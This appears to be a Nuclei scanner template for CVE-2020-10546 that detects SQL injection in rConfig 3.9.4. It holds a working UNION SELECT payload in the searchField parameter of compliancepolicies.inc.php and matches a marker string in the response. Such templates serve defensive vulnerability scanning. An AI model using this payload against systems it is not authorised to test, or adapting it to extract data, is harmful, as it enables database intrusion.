id: CVE-2020-10546 info: name: rConfig 3.9.4 SQLi author: madrobot severity: high reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10546 tags: cve,cve2020,rconfig,sqli requests: - method: GET path: - "{{BaseURL}}/compliancepolicies.inc.php?search=True&searchColumn=policyName&searchOption=contains&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL+--+" matchers-condition: and matchers: - type: status status: - 200 - type: word words: - "[project-discovery]" part: body